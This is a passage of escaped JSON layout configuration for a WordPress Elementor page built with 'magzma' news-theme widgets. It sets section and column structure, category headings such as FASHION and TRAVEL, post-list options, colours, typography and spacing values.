ove_count_hov_color\":\"#ffffff\",\"use_category\":\"on\",\"category_title_color\":\"#ffffff\",\"category_title_hover_color\":\"#ffffff\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"use_title\":\"on\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size\":{\"unit\":\"px\",\"size\":22},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight\":\"400\",\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_date\":\"on\",\"typhography_date_color\":\"#f1f1f1\",\"typhography_date_hov_color\":\"#f1f1f1\",\"date_font_size\":{\"unit\":\"px\",\"size\":14},\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight\":\"400\",\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"use_read\":\"on\",\"typhography_read_color\":\"#f1f1f1\",\"typhography_read_hov_color\":\"#f1f1f1\",\"read_font_size\":{\"unit\":\"px\",\"size\":16},\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight\":\"400\",\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"use_icon\":\"on\",\"post_icon_color\":\"#ffffff\",\"post_icon_color1\":\"#61c436\",\"post_icon_color2\":\"#007AFE\",\"post_icon_size\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_use\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size\":{\"unit\":\"px\",\"size\":25},\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"animate\":\"fade in\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"\",\"category\":[\"7\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"section_magzma_main_news_post_control\":\"\",\"image_overlay\":\"rgba(0,0,0,0.3)\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"text_align\":\"\",\"text_align_tablet\":\"\",\"text_align_mobile\":\"\",\"width\":\"300\",\"height\":\"250\",\"love_count\":\"on\",\"love_count_color\":\"#ffffff\",\"love_count_hov_color\":\"#ffffff\",\"use_category\":\"on\",\"category_title_color\":\"#ffffff\",\"category_title_hover_color\":\"#ffffff\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"use_title\":\"on\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size\":{\"unit\":\"px\",\"size\":22},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight\":\"400\",\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_date\":\"on\",\"typhography_date_color\":\"#f1f1f1\",\"typhography_date_hov_color\":\"#f1f1f1\",\"date_font_size\":{\"unit\":\"px\",\"size\":14},\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight\":\"400\",\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"use_read\":\"on\",\"typhography_read_color\":\"#f1f1f1\",\"typhography_read_hov_color\":\"#f1f1f1\",\"read_font_size\":{\"unit\":\"px\",\"size\":16},\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight\":\"400\",\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"use_icon\":\"on\",\"post_icon_color\":\"#ffffff\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"0\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_use\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size\":{\"unit\":\"px\",\"size\":25},\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"animate\":\"fade in\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"stretch_section\":\"\",\"layout\":\"boxed\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"height\":\"default\",\"custom_height\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"20\",\"sticky_element\":\"\",\"section_background\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_inline_size\":\"65.004\",\"_column_size\":50,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"7pepaj8\",\"elType\":\"widget\",\"settings\":{\"section_magzma_head_title\":\"\",\"choose_style\":\"7\",\"the_title\":\"FASHION\",\"title_size\":\"h4\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_family\":\"\",\"typography_title_font_weight\":\"400\",\"typography_title_text_transform\":\"\",\"typography_title_font_style\":\"\",\"typography_title_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"section_magzma_head_title_style\":\"\",\"title_color_1\":\"\",\"section_magzma_head_title_2\":\"\",\"title_color_2\":\"#111111\",\"title_border_color_2\":\"#111111\",\"title_bg_color_2\":\"#ffffff\",\"section_magzma_head_title_3\":\"\",\"title_color_3\":\"#111111\",\"title_border_color_3\":\"#e8e8e8\",\"title_bg_color_3\":\"#ffffff\",\"section_magzma_head_title_4\":\"\",\"title_color_4\":\"#ffffff\",\"title_border_color_4\":\"#111\",\"title_bg_color_4\":\"#111\",\"vertical_position_title_4\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"section_magzma_head_title_5\":\"\",\"title_color_5\":\"#111111\",\"border_color_5\":\"#e1e1e1\",\"text_border_color_5\":\"#61c436\",\"section_magzma_head_title_6\":\"\",\"title_color_6\":\"#111111\",\"border_color_6\":\"#61c436\",\"section_magzma_head_title_7\":\"\",\"title_color_7\":\"#ffffff\",\"wrapper_bg_color_7\":\"#e5e5e5\",\"text_bg_color_7\":\"#c9975f\",\"section_magzma_head_title_8\":\"\",\"big_title_8\":\"BIG TITLE\",\"title_color_8\":\"#111111\",\"big_title_color_8\":\"#111111\",\"vertical_position_big_title_8\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-65},\"horizontal_position_big_title_8\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-2},\"typography_big_title_8_typography\":\"\",\"typography_big_title_8_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_family\":\"\",\"typography_big_title_8_font_weight\":\"\",\"typography_big_title_8_text_transform\":\"\",\"typography_big_title_8_font_style\":\"\",\"typography_big_title_8_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-head-title\"},{\"id\":\"4lwlyjm\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"6\",\"offset\":\"\",\"category\":[\"4\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-5\",\"section_magzma_post_list_5_post_control\":\"\",\"width\":\"\",\"height\":\"\",\"border_hover_color\":\"#c9975f\",\"use_shadow\":\"use\",\"use_category\":\"on\",\"category_title_color\":\"#c9975f\",\"category_title_hov_color\":\"#c9975f\",\"category_line_height\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"category_font_size\":{\"unit\":\"px\",\"size\":16},\"category_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"category_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"category_font_weight\":\"500\",\"category_font_weight_tablet\":\"500\",\"category_font_weight_mobile\":\"500\",\"use_title\":\"on\",\"typhography_title_color\":\"#000000\",\"typhography_title_hov_color\":\"#aaaaaa\",\"title_line_height\":{\"unit\":\"em\",\"size\":1.25},\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"title_font_size\":{\"unit\":\"px\",\"size\":\"16\"},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"title_font_weight\":\"600\",\"title_font_weight_tablet\":\"600\",\"title_font_weight_mobile\":\"600\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_excerpt\":\"\",\"excerpt_value\":\"10\",\"typhography_excerpt_color\":\"rgba(0,0,0,0.7)\",\"excerpt_line_height\":{\"unit\":\"em\",\"size\":1.5},\"excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"excerpt1_font_size\":{\"unit\":\"px\",\"size\":18},\"excerpt1_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"excerpt1_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"excerpt_font_weight\":\"400\",\"excerpt_font_weight_tablet\":\"400\",\"excerpt_font_weight_mobile\":\"400\",\"use_comment\":\"on\",\"typhography_comment_color\":\"#c9975f\",\"typhography_comment_hov_color\":\"#c9975f\",\"comment_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"comment_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"comment_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"comment_font_size\":{\"unit\":\"px\",\"size\":\"12\"},\"comment_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"comment_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"comment_font_weight\":\"400\",\"comment_font_weight_tablet\":\"400\",\"comment_font_weight_mobile\":\"400\",\"use_button\":\"on\",\"button_color\":\"#000000\",\"button_hover_color\":\"#c9975f\",\"button_line_height\":{\"unit\":\"em\",\"size\":1.5},\"button_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"button_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"button_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"button_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"button_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"button_font_weight\":\"500\",\"button_font_weight_tablet\":\"500\",\"button_font_weight_mobile\":\"500\",\"section_magzma_column_control\":\"\",\"margin_bottom\":\"20\",\"horizontal_use\":\"left\",\"horizontal_col_select\":\"column-3\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-5\"},{\"id\":\"mkgirdt\",\"elType\":\"widget\",\"settings\":{\"section_magzma_head_title\":\"\",\"choose_style\":\"7\",\"the_title\":\"TRAVEL\",\"title_size\":\"h4\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_family\":\"\",\"typography_title_font_weight\":\"400\",\"typography_title_text_transform\":\"\",\"typography_title_font_style\":\"\",\"typography_title_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"align\":\"\",\"ali